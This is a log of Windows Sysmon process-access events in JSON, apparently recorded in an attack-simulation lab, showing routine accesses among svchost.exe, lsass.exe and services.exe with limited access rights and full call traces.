{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":877,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":878,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":879,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010D6020100}\r\nTargetProcessId: 1808\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010D6020100}","TargetProcessId":"1808","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":880,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":881,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":882,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":883,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":884,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
